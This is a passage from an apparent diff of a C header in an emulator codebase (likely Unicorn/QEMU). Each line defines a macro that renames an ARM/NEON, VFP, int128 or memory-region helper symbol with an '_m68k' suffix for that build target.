helper_neon_hadd_s16_m68k +#define helper_neon_hadd_s32 helper_neon_hadd_s32_m68k +#define helper_neon_hadd_s8 helper_neon_hadd_s8_m68k +#define helper_neon_hadd_u16 helper_neon_hadd_u16_m68k +#define helper_neon_hadd_u32 helper_neon_hadd_u32_m68k +#define helper_neon_hadd_u8 helper_neon_hadd_u8_m68k +#define helper_neon_hsub_s16 helper_neon_hsub_s16_m68k +#define helper_neon_hsub_s32 
helper_neon_hsub_s32_m68k +#define helper_neon_hsub_s8 helper_neon_hsub_s8_m68k +#define helper_neon_hsub_u16 helper_neon_hsub_u16_m68k +#define helper_neon_hsub_u32 helper_neon_hsub_u32_m68k +#define helper_neon_hsub_u8 helper_neon_hsub_u8_m68k +#define helper_neon_max_s16 helper_neon_max_s16_m68k +#define helper_neon_max_s32 helper_neon_max_s32_m68k +#define helper_neon_max_s8 helper_neon_max_s8_m68k +#define helper_neon_max_u16 helper_neon_max_u16_m68k +#define helper_neon_max_u32 helper_neon_max_u32_m68k +#define helper_neon_max_u8 helper_neon_max_u8_m68k +#define helper_neon_min_s16 helper_neon_min_s16_m68k +#define helper_neon_min_s32 helper_neon_min_s32_m68k +#define helper_neon_min_s8 helper_neon_min_s8_m68k +#define helper_neon_min_u16 helper_neon_min_u16_m68k +#define helper_neon_min_u32 helper_neon_min_u32_m68k +#define helper_neon_min_u8 helper_neon_min_u8_m68k +#define helper_neon_mull_p8 helper_neon_mull_p8_m68k +#define helper_neon_mull_s16 helper_neon_mull_s16_m68k +#define helper_neon_mull_s8 helper_neon_mull_s8_m68k +#define helper_neon_mull_u16 helper_neon_mull_u16_m68k +#define helper_neon_mull_u8 helper_neon_mull_u8_m68k +#define helper_neon_mul_p8 helper_neon_mul_p8_m68k +#define helper_neon_mul_u16 helper_neon_mul_u16_m68k +#define helper_neon_mul_u8 helper_neon_mul_u8_m68k +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_m68k +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_m68k +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_m68k +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_m68k +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_m68k +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_m68k +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_m68k +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_m68k +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_m68k +#define helper_neon_narrow_sat_u8 
helper_neon_narrow_sat_u8_m68k +#define helper_neon_narrow_u16 helper_neon_narrow_u16_m68k +#define helper_neon_narrow_u8 helper_neon_narrow_u8_m68k +#define helper_neon_negl_u16 helper_neon_negl_u16_m68k +#define helper_neon_negl_u32 helper_neon_negl_u32_m68k +#define helper_neon_paddl_u16 helper_neon_paddl_u16_m68k +#define helper_neon_paddl_u32 helper_neon_paddl_u32_m68k +#define helper_neon_padd_u16 helper_neon_padd_u16_m68k +#define helper_neon_padd_u8 helper_neon_padd_u8_m68k +#define helper_neon_pmax_s16 helper_neon_pmax_s16_m68k +#define helper_neon_pmax_s8 helper_neon_pmax_s8_m68k +#define helper_neon_pmax_u16 helper_neon_pmax_u16_m68k +#define helper_neon_pmax_u8 helper_neon_pmax_u8_m68k +#define helper_neon_pmin_s16 helper_neon_pmin_s16_m68k +#define helper_neon_pmin_s8 helper_neon_pmin_s8_m68k +#define helper_neon_pmin_u16 helper_neon_pmin_u16_m68k +#define helper_neon_pmin_u8 helper_neon_pmin_u8_m68k +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_m68k +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_m68k +#define helper_neon_qabs_s16 helper_neon_qabs_s16_m68k +#define helper_neon_qabs_s32 helper_neon_qabs_s32_m68k +#define helper_neon_qabs_s64 helper_neon_qabs_s64_m68k +#define helper_neon_qabs_s8 helper_neon_qabs_s8_m68k +#define helper_neon_qadd_s16 helper_neon_qadd_s16_m68k +#define helper_neon_qadd_s32 helper_neon_qadd_s32_m68k +#define helper_neon_qadd_s64 helper_neon_qadd_s64_m68k +#define helper_neon_qadd_s8 helper_neon_qadd_s8_m68k +#define helper_neon_qadd_u16 helper_neon_qadd_u16_m68k +#define helper_neon_qadd_u32 helper_neon_qadd_u32_m68k +#define helper_neon_qadd_u64 helper_neon_qadd_u64_m68k +#define helper_neon_qadd_u8 helper_neon_qadd_u8_m68k +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_m68k +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_m68k +#define helper_neon_qneg_s16 helper_neon_qneg_s16_m68k +#define helper_neon_qneg_s32 helper_neon_qneg_s32_m68k +#define helper_neon_qneg_s64 
helper_neon_qneg_s64_m68k +#define helper_neon_qneg_s8 helper_neon_qneg_s8_m68k +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_m68k +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_m68k +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_m68k +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_m68k +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_m68k +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_m68k +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_m68k +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_m68k +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_m68k +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_m68k +#define helper_neon_qshl_s16 helper_neon_qshl_s16_m68k +#define helper_neon_qshl_s32 helper_neon_qshl_s32_m68k +#define helper_neon_qshl_s64 helper_neon_qshl_s64_m68k +#define helper_neon_qshl_s8 helper_neon_qshl_s8_m68k +#define helper_neon_qshl_u16 helper_neon_qshl_u16_m68k +#define helper_neon_qshl_u32 helper_neon_qshl_u32_m68k +#define helper_neon_qshl_u64 helper_neon_qshl_u64_m68k +#define helper_neon_qshl_u8 helper_neon_qshl_u8_m68k +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_m68k +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_m68k +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_m68k +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_m68k +#define helper_neon_qsub_s16 helper_neon_qsub_s16_m68k +#define helper_neon_qsub_s32 helper_neon_qsub_s32_m68k +#define helper_neon_qsub_s64 helper_neon_qsub_s64_m68k +#define helper_neon_qsub_s8 helper_neon_qsub_s8_m68k +#define helper_neon_qsub_u16 helper_neon_qsub_u16_m68k +#define helper_neon_qsub_u32 helper_neon_qsub_u32_m68k +#define helper_neon_qsub_u64 helper_neon_qsub_u64_m68k +#define helper_neon_qsub_u8 helper_neon_qsub_u8_m68k +#define helper_neon_qunzip16 helper_neon_qunzip16_m68k +#define helper_neon_qunzip32 helper_neon_qunzip32_m68k +#define helper_neon_qunzip8 helper_neon_qunzip8_m68k +#define helper_neon_qzip16 helper_neon_qzip16_m68k 
+#define helper_neon_qzip32 helper_neon_qzip32_m68k +#define helper_neon_qzip8 helper_neon_qzip8_m68k +#define helper_neon_rbit_u8 helper_neon_rbit_u8_m68k +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_m68k +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_m68k +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_m68k +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_m68k +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_m68k +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_m68k +#define helper_neon_rshl_s16 helper_neon_rshl_s16_m68k +#define helper_neon_rshl_s32 helper_neon_rshl_s32_m68k +#define helper_neon_rshl_s64 helper_neon_rshl_s64_m68k +#define helper_neon_rshl_s8 helper_neon_rshl_s8_m68k +#define helper_neon_rshl_u16 helper_neon_rshl_u16_m68k +#define helper_neon_rshl_u32 helper_neon_rshl_u32_m68k +#define helper_neon_rshl_u64 helper_neon_rshl_u64_m68k +#define helper_neon_rshl_u8 helper_neon_rshl_u8_m68k +#define helper_neon_shl_s16 helper_neon_shl_s16_m68k +#define helper_neon_shl_s32 helper_neon_shl_s32_m68k +#define helper_neon_shl_s64 helper_neon_shl_s64_m68k +#define helper_neon_shl_s8 helper_neon_shl_s8_m68k +#define helper_neon_shl_u16 helper_neon_shl_u16_m68k +#define helper_neon_shl_u32 helper_neon_shl_u32_m68k +#define helper_neon_shl_u64 helper_neon_shl_u64_m68k +#define helper_neon_shl_u8 helper_neon_shl_u8_m68k +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_m68k +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_m68k +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_m68k +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_m68k +#define helper_neon_subl_u16 helper_neon_subl_u16_m68k +#define helper_neon_subl_u32 helper_neon_subl_u32_m68k +#define helper_neon_sub_u16 helper_neon_sub_u16_m68k +#define helper_neon_sub_u8 helper_neon_sub_u8_m68k +#define helper_neon_tbl helper_neon_tbl_m68k +#define helper_neon_tst_u16 helper_neon_tst_u16_m68k +#define helper_neon_tst_u32 helper_neon_tst_u32_m68k +#define 
helper_neon_tst_u8 helper_neon_tst_u8_m68k +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_m68k +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_m68k +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_m68k +#define helper_neon_unzip16 helper_neon_unzip16_m68k +#define helper_neon_unzip8 helper_neon_unzip8_m68k +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_m68k +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_m68k +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_m68k +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_m68k +#define helper_neon_widen_s16 helper_neon_widen_s16_m68k +#define helper_neon_widen_s8 helper_neon_widen_s8_m68k +#define helper_neon_widen_u16 helper_neon_widen_u16_m68k +#define helper_neon_widen_u8 helper_neon_widen_u8_m68k +#define helper_neon_zip16 helper_neon_zip16_m68k +#define helper_neon_zip8 helper_neon_zip8_m68k +#define helper_pre_hvc helper_pre_hvc_m68k +#define helper_pre_smc helper_pre_smc_m68k +#define helper_qadd16 helper_qadd16_m68k +#define helper_qadd8 helper_qadd8_m68k +#define helper_qaddsubx helper_qaddsubx_m68k +#define helper_qsub16 helper_qsub16_m68k +#define helper_qsub8 helper_qsub8_m68k +#define helper_qsubaddx helper_qsubaddx_m68k +#define helper_rbit helper_rbit_m68k +#define helper_recpe_f32 helper_recpe_f32_m68k +#define helper_recpe_f64 helper_recpe_f64_m68k +#define helper_recpe_u32 helper_recpe_u32_m68k +#define helper_recps_f32 helper_recps_f32_m68k +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_m68k +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_m68k +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_m68k +#define helper_ret_stb_mmu helper_ret_stb_mmu_m68k +#define helper_rintd helper_rintd_m68k +#define helper_rintd_exact helper_rintd_exact_m68k +#define helper_rints helper_rints_m68k +#define helper_rints_exact helper_rints_exact_m68k +#define helper_ror_cc helper_ror_cc_m68k +#define helper_rsqrte_f32 helper_rsqrte_f32_m68k +#define helper_rsqrte_f64 
helper_rsqrte_f64_m68k +#define helper_rsqrte_u32 helper_rsqrte_u32_m68k +#define helper_rsqrts_f32 helper_rsqrts_f32_m68k +#define helper_sadd16 helper_sadd16_m68k +#define helper_sadd8 helper_sadd8_m68k +#define helper_saddsubx helper_saddsubx_m68k +#define helper_sar_cc helper_sar_cc_m68k +#define helper_sdiv helper_sdiv_m68k +#define helper_sel_flags helper_sel_flags_m68k +#define helper_set_cp_reg helper_set_cp_reg_m68k +#define helper_set_cp_reg64 helper_set_cp_reg64_m68k +#define helper_set_neon_rmode helper_set_neon_rmode_m68k +#define helper_set_r13_banked helper_set_r13_banked_m68k +#define helper_set_rmode helper_set_rmode_m68k +#define helper_set_user_reg helper_set_user_reg_m68k +#define helper_shadd16 helper_shadd16_m68k +#define helper_shadd8 helper_shadd8_m68k +#define helper_shaddsubx helper_shaddsubx_m68k +#define helper_shl_cc helper_shl_cc_m68k +#define helper_shr_cc helper_shr_cc_m68k +#define helper_shsub16 helper_shsub16_m68k +#define helper_shsub8 helper_shsub8_m68k +#define helper_shsubaddx helper_shsubaddx_m68k +#define helper_ssat helper_ssat_m68k +#define helper_ssat16 helper_ssat16_m68k +#define helper_ssub16 helper_ssub16_m68k +#define helper_ssub8 helper_ssub8_m68k +#define helper_ssubaddx helper_ssubaddx_m68k +#define helper_stb_mmu helper_stb_mmu_m68k +#define helper_stl_mmu helper_stl_mmu_m68k +#define helper_stq_mmu helper_stq_mmu_m68k +#define helper_stw_mmu helper_stw_mmu_m68k +#define helper_sub_saturate helper_sub_saturate_m68k +#define helper_sub_usaturate helper_sub_usaturate_m68k +#define helper_sxtb16 helper_sxtb16_m68k +#define helper_uadd16 helper_uadd16_m68k +#define helper_uadd8 helper_uadd8_m68k +#define helper_uaddsubx helper_uaddsubx_m68k +#define helper_udiv helper_udiv_m68k +#define helper_uhadd16 helper_uhadd16_m68k +#define helper_uhadd8 helper_uhadd8_m68k +#define helper_uhaddsubx helper_uhaddsubx_m68k +#define helper_uhsub16 helper_uhsub16_m68k +#define helper_uhsub8 helper_uhsub8_m68k +#define 
helper_uhsubaddx helper_uhsubaddx_m68k +#define helper_uqadd16 helper_uqadd16_m68k +#define helper_uqadd8 helper_uqadd8_m68k +#define helper_uqaddsubx helper_uqaddsubx_m68k +#define helper_uqsub16 helper_uqsub16_m68k +#define helper_uqsub8 helper_uqsub8_m68k +#define helper_uqsubaddx helper_uqsubaddx_m68k +#define helper_usad8 helper_usad8_m68k +#define helper_usat helper_usat_m68k +#define helper_usat16 helper_usat16_m68k +#define helper_usub16 helper_usub16_m68k +#define helper_usub8 helper_usub8_m68k +#define helper_usubaddx helper_usubaddx_m68k +#define helper_uxtb16 helper_uxtb16_m68k +#define helper_v7m_mrs helper_v7m_mrs_m68k +#define helper_v7m_msr helper_v7m_msr_m68k +#define helper_vfp_absd helper_vfp_absd_m68k +#define helper_vfp_abss helper_vfp_abss_m68k +#define helper_vfp_addd helper_vfp_addd_m68k +#define helper_vfp_adds helper_vfp_adds_m68k +#define helper_vfp_cmpd helper_vfp_cmpd_m68k +#define helper_vfp_cmped helper_vfp_cmped_m68k +#define helper_vfp_cmpes helper_vfp_cmpes_m68k +#define helper_vfp_cmps helper_vfp_cmps_m68k +#define helper_vfp_divd helper_vfp_divd_m68k +#define helper_vfp_divs helper_vfp_divs_m68k +#define helper_vfp_fcvtds helper_vfp_fcvtds_m68k +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_m68k +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_m68k +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_m68k +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_m68k +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_m68k +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_m68k +#define helper_vfp_maxd helper_vfp_maxd_m68k +#define helper_vfp_maxnumd helper_vfp_maxnumd_m68k +#define helper_vfp_maxnums helper_vfp_maxnums_m68k +#define helper_vfp_maxs helper_vfp_maxs_m68k +#define helper_vfp_mind helper_vfp_mind_m68k +#define helper_vfp_minnumd helper_vfp_minnumd_m68k +#define helper_vfp_minnums helper_vfp_minnums_m68k +#define helper_vfp_mins helper_vfp_mins_m68k +#define helper_vfp_muladdd 
helper_vfp_muladdd_m68k +#define helper_vfp_muladds helper_vfp_muladds_m68k +#define helper_vfp_muld helper_vfp_muld_m68k +#define helper_vfp_muls helper_vfp_muls_m68k +#define helper_vfp_negd helper_vfp_negd_m68k +#define helper_vfp_negs helper_vfp_negs_m68k +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_m68k +#define helper_vfp_shtod helper_vfp_shtod_m68k +#define helper_vfp_shtos helper_vfp_shtos_m68k +#define helper_vfp_sitod helper_vfp_sitod_m68k +#define helper_vfp_sitos helper_vfp_sitos_m68k +#define helper_vfp_sltod helper_vfp_sltod_m68k +#define helper_vfp_sltos helper_vfp_sltos_m68k +#define helper_vfp_sqrtd helper_vfp_sqrtd_m68k +#define helper_vfp_sqrts helper_vfp_sqrts_m68k +#define helper_vfp_sqtod helper_vfp_sqtod_m68k +#define helper_vfp_sqtos helper_vfp_sqtos_m68k +#define helper_vfp_subd helper_vfp_subd_m68k +#define helper_vfp_subs helper_vfp_subs_m68k +#define helper_vfp_toshd helper_vfp_toshd_m68k +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_m68k +#define helper_vfp_toshs helper_vfp_toshs_m68k +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_m68k +#define helper_vfp_tosid helper_vfp_tosid_m68k +#define helper_vfp_tosis helper_vfp_tosis_m68k +#define helper_vfp_tosizd helper_vfp_tosizd_m68k +#define helper_vfp_tosizs helper_vfp_tosizs_m68k +#define helper_vfp_tosld helper_vfp_tosld_m68k +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_m68k +#define helper_vfp_tosls helper_vfp_tosls_m68k +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_m68k +#define helper_vfp_tosqd helper_vfp_tosqd_m68k +#define helper_vfp_tosqs helper_vfp_tosqs_m68k +#define helper_vfp_touhd helper_vfp_touhd_m68k +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_m68k +#define helper_vfp_touhs helper_vfp_touhs_m68k +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_m68k +#define helper_vfp_touid helper_vfp_touid_m68k +#define helper_vfp_touis 
helper_vfp_touis_m68k +#define helper_vfp_touizd helper_vfp_touizd_m68k +#define helper_vfp_touizs helper_vfp_touizs_m68k +#define helper_vfp_tould helper_vfp_tould_m68k +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_m68k +#define helper_vfp_touls helper_vfp_touls_m68k +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_m68k +#define helper_vfp_touqd helper_vfp_touqd_m68k +#define helper_vfp_touqs helper_vfp_touqs_m68k +#define helper_vfp_uhtod helper_vfp_uhtod_m68k +#define helper_vfp_uhtos helper_vfp_uhtos_m68k +#define helper_vfp_uitod helper_vfp_uitod_m68k +#define helper_vfp_uitos helper_vfp_uitos_m68k +#define helper_vfp_ultod helper_vfp_ultod_m68k +#define helper_vfp_ultos helper_vfp_ultos_m68k +#define helper_vfp_uqtod helper_vfp_uqtod_m68k +#define helper_vfp_uqtos helper_vfp_uqtos_m68k +#define helper_wfe helper_wfe_m68k +#define helper_wfi helper_wfi_m68k +#define hex2decimal hex2decimal_m68k +#define hw_breakpoint_update hw_breakpoint_update_m68k +#define hw_breakpoint_update_all hw_breakpoint_update_all_m68k +#define hw_watchpoint_update hw_watchpoint_update_m68k +#define hw_watchpoint_update_all hw_watchpoint_update_all_m68k +#define _init _init_m68k +#define init_cpreg_list init_cpreg_list_m68k +#define init_lists init_lists_m68k +#define input_type_enum input_type_enum_m68k +#define int128_2_64 int128_2_64_m68k +#define int128_add int128_add_m68k +#define int128_addto int128_addto_m68k +#define int128_and int128_and_m68k +#define int128_eq int128_eq_m68k +#define int128_ge int128_ge_m68k +#define int128_get64 int128_get64_m68k +#define int128_gt int128_gt_m68k +#define int128_le int128_le_m68k +#define int128_lt int128_lt_m68k +#define int128_make64 int128_make64_m68k +#define int128_max int128_max_m68k +#define int128_min int128_min_m68k +#define int128_ne int128_ne_m68k +#define int128_neg int128_neg_m68k +#define int128_nz int128_nz_m68k +#define int128_rshift int128_rshift_m68k +#define int128_sub 
int128_sub_m68k +#define int128_subfrom int128_subfrom_m68k +#define int128_zero int128_zero_m68k +#define int16_to_float32 int16_to_float32_m68k +#define int16_to_float64 int16_to_float64_m68k +#define int32_to_float128 int32_to_float128_m68k +#define int32_to_float32 int32_to_float32_m68k +#define int32_to_float64 int32_to_float64_m68k +#define int32_to_floatx80 int32_to_floatx80_m68k +#define int64_to_float128 int64_to_float128_m68k +#define int64_to_float32 int64_to_float32_m68k +#define int64_to_float64 int64_to_float64_m68k +#define int64_to_floatx80 int64_to_floatx80_m68k +#define invalidate_and_set_dirty invalidate_and_set_dirty_m68k +#define invalidate_page_bitmap invalidate_page_bitmap_m68k +#define io_mem_read io_mem_read_m68k +#define io_mem_write io_mem_write_m68k +#define io_readb io_readb_m68k +#define io_readl io_readl_m68k +#define io_readq io_readq_m68k +#define io_readw io_readw_m68k +#define iotlb_to_region iotlb_to_region_m68k +#define io_writeb io_writeb_m68k +#define io_writel io_writel_m68k +#define io_writeq io_writeq_m68k +#define io_writew io_writew_m68k +#define is_a64 is_a64_m68k +#define is_help_option is_help_option_m68k +#define isr_read isr_read_m68k +#define is_valid_option_list is_valid_option_list_m68k +#define iwmmxt_load_creg iwmmxt_load_creg_m68k +#define iwmmxt_load_reg iwmmxt_load_reg_m68k +#define iwmmxt_store_creg iwmmxt_store_creg_m68k +#define iwmmxt_store_reg iwmmxt_store_reg_m68k +#define __jit_debug_descriptor __jit_debug_descriptor_m68k +#define __jit_debug_register_code __jit_debug_register_code_m68k +#define kvm_to_cpreg_id kvm_to_cpreg_id_m68k +#define last_ram_offset last_ram_offset_m68k +#define ldl_be_p ldl_be_p_m68k +#define ldl_be_phys ldl_be_phys_m68k +#define ldl_he_p ldl_he_p_m68k +#define ldl_le_p ldl_le_p_m68k +#define ldl_le_phys ldl_le_phys_m68k +#define ldl_phys ldl_phys_m68k +#define ldl_phys_internal ldl_phys_internal_m68k +#define ldq_be_p ldq_be_p_m68k +#define ldq_be_phys ldq_be_phys_m68k 
+#define ldq_he_p ldq_he_p_m68k +#define ldq_le_p ldq_le_p_m68k +#define ldq_le_phys ldq_le_phys_m68k +#define ldq_phys ldq_phys_m68k +#define ldq_phys_internal ldq_phys_internal_m68k +#define ldst_name ldst_name_m68k +#define ldub_p ldub_p_m68k +#define ldub_phys ldub_phys_m68k +#define lduw_be_p lduw_be_p_m68k +#define lduw_be_phys lduw_be_phys_m68k +#define lduw_he_p lduw_he_p_m68k +#define lduw_le_p lduw_le_p_m68k +#define lduw_le_phys lduw_le_phys_m68k +#define lduw_phys lduw_phys_m68k +#define lduw_phys_internal lduw_phys_internal_m68k +#define le128 le128_m68k +#define linked_bp_matches linked_bp_matches_m68k +#define listener_add_address_space listener_add_address_space_m68k +#define load_cpu_offset load_cpu_offset_m68k +#define load_reg load_reg_m68k +#define load_reg_var load_reg_var_m68k +#define log_cpu_state log_cpu_state_m68k +#define lpae_cp_reginfo lpae_cp_reginfo_m68k +#define lt128 lt128_m68k +#define machine_class_init machine_class_init_m68k +#define machine_finalize machine_finalize_m68k +#define machine_info machine_info_m68k +#define machine_initfn machine_initfn_m68k +#define machine_register_types machine_register_types_m68k +#define machvirt_init machvirt_init_m68k +#define machvirt_machine_init machvirt_machine_init_m68k +#define maj maj_m68k +#define mapping_conflict mapping_conflict_m68k +#define mapping_contiguous mapping_contiguous_m68k +#define mapping_have_same_region mapping_have_same_region_m68k +#define mapping_merge mapping_merge_m68k +#define mem_add mem_add_m68k +#define mem_begin mem_begin_m68k +#define mem_commit mem_commit_m68k +#define memory_access_is_direct memory_access_is_direct_m68k +#define memory_access_size memory_access_size_m68k +#define memory_init memory_init_m68k +#define memory_listener_match memory_listener_match_m68k +#define memory_listener_register memory_listener_register_m68k +#define memory_listener_unregister memory_listener_unregister_m68k +#define memory_map_init memory_map_init_m68k +#define 
memory_mapping_filter memory_mapping_filter_m68k +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_m68k +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_m68k +#define memory_mapping_list_free memory_mapping_list_free_m68k +#define memory_mapping_list_init memory_mapping_list_init_m68k +#define memory_region_access_valid memory_region_access_valid_m68k +#define memory_region_add_subregion memory_region_add_subregion_m68k +#define memory_region_add_subregion_common memory_region_add_subregion_common_m68k +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_m68k +#define memory_region_big_endian memory_region_big_endian_m68k +#define memory_region_clear_pending memory_region_clear_pending_m68k +#define memory_region_del_subregion memory_region_del_subregion_m68k +#define memory_region_destructor_alias memory_region_destructor_alias_m68k +#define memory_region_destructor_none memory_region_destructor_none_m68k +#define memory_region_destructor_ram memory_region_destructor_ram_m68k +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_m68k +#define memory_region_dispatch_read memory_region_dispatch_read_m68k +#define memory_region_dispatch_read1 memory_region_dispatch_read1_m68k +#define memory_region_dispatch_write memory_region_dispatch_write_m68k +#define memory_region_escape_name memory_region_escape_name_m68k +#define memory_region_finalize memory_region_finalize_m68k +#define memory_region_find memory_region_find_m68k +#define memory_region_get_addr memory_region_get_addr_m68k +#define memory_region_get_alignment memory_region_get_alignment_m68k +#define memory_region_get_container memory_region_get_container_m68k +#define memory_region_get_fd memory_region_get_fd_m68k +#define memory_region_get_may_overlap memory_region_get_may_overlap_m68k +#define memory_region_get_priority memory_region_get_priority_m68k +#define 
memory_region_get_ram_addr memory_region_get_ram_addr_m68k +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_m68k +#define memory_region_get_size memory_region_get_size_m68k +#define memory_region_info memory_region_info_m68k +#define memory_region_init memory_region_init_m68k +#define memory_region_init_alias memory_region_init_alias_m68k +#define memory_region_initfn memory_region_initfn_m68k +#define memory_region_init_io memory_region_init_io_m68k +#define memory_region_init_ram memory_region_init_ram_m68k +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_m68k +#define memory_region_init_reservation memory_region_init_reservation_m68k +#define memory_region_is_iommu memory_region_is_iommu_m68k +#define memory_region_is_logging memory_region_is_logging_m68k +#define memory_region_is_mapped memory_region_is_mapped_m68k +#define memory_region_is_ram memory_region_is_ram_m68k +#define memory_region_is_rom memory_region_is_rom_m68k +#define memory_region_is_romd memory_region_is_romd_m68k +#define memory_region_is_skip_dump memory_region_is_skip_dump_m68k +#define memory_region_is_unassigned memory_region_is_unassigned_m68k +#define memory_region_name memory_region_name_m68k +#define memory_region_need_escape memory_region_need_escape_m68k +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_m68k +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_m68k +#define memory_region_present memory_region_present_m68k +#define memory_region_read_accessor memory_region_read_accessor_m68k +#define memory_region_readd_subregion memory_region_readd_subregion_m68k +#define memory_region_ref memory_region_ref_m68k +#define memory_region_resolve_container memory_region_resolve_container_m68k +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_m68k +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_m68k +#define memory_region_set_address 
memory_region_set_address_m68k +#define memory_region_set_alias_offset memory_region_set_alias_offset_m68k +#define memory_region_set_enabled memory_region_set_enabled_m68k +#define memory_region_set_readonly memory_region_set_readonly_m68k +#define memory_region_set_skip_dump memory_region_set_skip_dump_m68k +#define memory_region_size memory_region_size_m68k +#define memory_region_to_address_space memory_region_to_address_space_m68k +#define memory_region_transaction_begin memory_region_transaction_begin_m68k +#define memory_region_transaction_commit memory_region_transaction_commit_m68k +#define memory_region_unref memory_region_unref_m68k +#define memory_region_update_container_subregions memory_region_update_container_subregions_m68k +#define memory_region_write_accessor memory_region_write_accessor_m68k +#define memory_region_wrong_endianness memory_region_wrong_endianness_m68k +#define memory_try_enable_merging memory_try_enable_merging_m68k +#define module_call_init module_call_init_m68k +#define module_load module_load_m68k +#define mpidr_cp_reginfo mpidr_cp_reginfo_m68k +#define mpidr_read mpidr_read_m68k +#define msr_mask msr_mask_m68k +#define mul128By64To192 mul128By64To192_m68k +#define mul128To256 mul128To256_m68k +#define mul64To128 mul64To128_m68k +#define muldiv64 muldiv64_m68k +#define neon_2rm_is_float_op neon_2rm_is_float_op_m68k +#define neon_2rm_sizes neon_2rm_sizes_m68k +#define neon_3r_sizes neon_3r_sizes_m68k +#define neon_get_scalar neon_get_scalar_m68k +#define neon_load_reg neon_load_reg_m68k +#define neon_load_reg64 neon_load_reg64_m68k +#define neon_load_scratch neon_load_scratch_m68k +#define neon_ls_element_type neon_ls_element_type_m68k +#define neon_reg_offset neon_reg_offset_m68k +#define neon_store_reg neon_store_reg_m68k +#define neon_store_reg64 neon_store_reg64_m68k +#define neon_store_scratch neon_store_scratch_m68k +#define new_ldst_label new_ldst_label_m68k +#define next_list next_list_m68k +#define 
